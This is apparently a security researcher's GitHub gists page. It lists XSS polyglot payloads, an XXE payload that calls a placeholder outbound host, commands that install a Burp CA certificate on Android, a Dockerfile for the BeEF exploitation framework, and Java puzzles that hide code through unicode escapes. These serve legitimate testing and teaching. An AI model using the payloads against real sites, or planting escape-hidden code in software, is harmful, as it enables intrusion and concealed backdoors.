Skip to content

Instantly share code, notes, and snippets.

@eoftedal
eoftedal / default.conf
Last active Apr 20, 2020
Automatically adding forwarded/created x-b3-traceid to proxy_pass in nginx
View default.conf
map $http_x_b3_traceid $b3traceid {
"~^(?<traceid>[a-f0-9]{32})$" $traceid;
default $request_id;
}
proxy_set_header x-b3-traceId $b3traceid;
@eoftedal
eoftedal / dep-check.sh
Created Nov 22, 2019
Scan an image using OWASP Dependency check
View dep-check.sh
#!/bin/bash
export COLOR_NC=$(tput sgr0)
export COLOR_GREEN=$(tput setaf 2)
if [ $# -ne 2 ]; then
echo "ERROR: no image given"
echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>"
exit 1
fi
View xss-polyglots.txt
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:`</template>\"///"//<
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View Android burp
http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html
adb shell mount -o rw,remount /system
openssl x509 -in burp.cer -inform DER -text
openssl x509 -noout -subject_hash_old -inform DER -in burp.cer
adb push burp.cer /system/etc/security/cacerts/9a5ba575.0
@eoftedal
eoftedal / Dockerfile
Last active Nov 19, 2015
Dockerfile for BeEF
View Dockerfile
FROM ubuntu
RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl
RUN apt-get install -y software-properties-common && \
apt-add-repository -y ppa:brightbox/ruby-ng && \
apt-get update && \
apt-get install -y ruby2.1 ruby2.1-dev
WORKDIR /opt/
RUN locale-gen en_US.UTF-8
ENV LC_ALL en_US.UTF-8
RUN curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz && \
@eoftedal
eoftedal / Puzzle.java
Created Apr 24, 2015
What is printed?
View Puzzle.java
public class Puzzle {
public static void main(String[] args) {
String a = "1";
String b = "\u0022\u003b\u0061\u003d\u0022\u0032\u0022\u003b\u002f\u002f";
System.out.println(a);
}
}
View Lottery.java
import java.security.SecureRandom;
import java.math.BigInteger;
public class Lottery {
private static SecureRandom random = new SecureRandom();
public static void main(String[] args) {
/*
****************************************************************************************************************************************
View Lottery.java
import java.security.SecureRandom;
import java.math.BigInteger;
public class Lottery {
private static SecureRandom random = new SecureRandom();
public static void main(String[] args) {
String lotteryNumber = new BigInteger(130, random).toString(32);
/* Used when testing \u002a\u002f
lotteryNumber = "123";
View keybase.md

Keybase proof

I hereby claim:

  • I am eoftedal on github.
  • I am erlendoftedal (https://keybase.io/erlendoftedal) on keybase.
  • I have a public key whose fingerprint is 1971 4B8D 1365 B742 0C11 3537 E624 182F FB00 B0E6

To claim this, I am signing this object:

You can’t perform that action at this time.